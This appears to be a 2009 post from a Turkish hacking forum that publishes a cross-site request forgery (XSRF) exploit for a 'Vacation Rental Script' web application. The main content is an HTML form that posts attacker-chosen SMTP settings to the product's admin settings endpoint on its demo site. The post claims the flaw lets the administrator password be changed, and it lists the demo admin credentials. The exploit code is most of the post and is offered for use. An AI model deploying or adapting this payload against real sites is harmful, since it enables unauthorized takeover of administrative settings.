ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> Vacation Rental ~ XSRF Vuln.
Vacation Rental ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/BARCOD3
Date :
05.11.2009 00:07:44
#
Vacation Rental ~ XSRF Vuln.
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name : Vacation Rental Script # Vulnerable Type : XSRF # Infection : Administrator password Change Edilebilir. # author : BARCOD3 - Bug Researchers # Demo : http://www.vacationrentalscript.com/demo/ ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <h3>BARCOD3</h3> <form id=settings_emails method=post action=http://www.vacationrentalscript.com/demo/admin/settings/emails/emails enctype=multipart/form-data> <input class=text type=hidden name=smtp_host id=smtp_host value=localhost /> <input class=text type=hidden name=smtp_user id=smtp_user value=username /> <input class=text type=password name=smtp_password id=smtp_password value=passWORD /> <input class=short-text type=hidden name=smtp_port id=smtp_port value=25 /> <input class=short-text type=hidden name=delete_old_system_alerts_days id=delete_old_system_alerts_days value=1 /> <input class=btn-orange type=submit value=Save settings id=submit name=submit /> </form> *Note ; Demo User; admin Demo pass; admin < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
